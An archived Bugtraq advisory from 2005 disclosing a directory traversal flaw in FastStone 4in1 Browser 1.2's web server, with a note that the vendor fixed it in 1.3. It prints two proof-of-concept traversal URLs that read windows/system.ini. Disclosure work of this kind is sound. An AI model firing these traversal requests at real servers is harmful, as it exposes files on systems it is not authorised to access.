Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

directory traversal in FastStone 4in1 Browser 1.2

from [Donato Ferrante] Network Security [Permanent Link]
Subject: directory traversal in FastStone 4in1 Browser 1.2
Date: Tue, 29 Mar 2005 18:37:48 -0000 

                           Donato Ferrante


Application:  FastStone 4in1 Browser
              http://www.faststone.org

Version:      1.2

Bug:          directory traversal

Date:         29-Mar-2005

Author:       Donato Ferrante
              e-mail: fdonato@autistici.org
              web:    www.autistici.org/fdonato



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"A FREE multi-window Web Browser with a built-in Web Server."



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
2. The bug:
------------

The program by default has some checks to avoid malicious patterns
like "/../" into http requests, but it doesn't manage patterns like:
"\..\", "../" or "/.../".

So an attacker is able to see and download all the files on the remote
system simply using a browser.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability:

http://[host]/.../.../.../.../.../.../windows/system.ini

or:

http://[host]/..\..\..\..\..\..\..\..\windows/system.ini




xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

Vendor was contacted.
Bug fixed in the version 1.3.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • directory traversal in FastStone 4in1 Browser 1.2, Donato Ferrante <=
Previous by Date:  MITKRB5-SA-2005-001: buffer overflows in telnet client, Tom Yu
Next by Date:  Multiple sql injection, and xss vulnerabilities in AspApp, dcrab
Previous by Thread:  MITKRB5-SA-2005-001: buffer overflows in telnet client, Tom Yu
Next by Thread:  Multiple sql injection, and xss vulnerabilities in AspApp, dcrab
Indexes:  [Date] [Thread] [Top] [All Lists]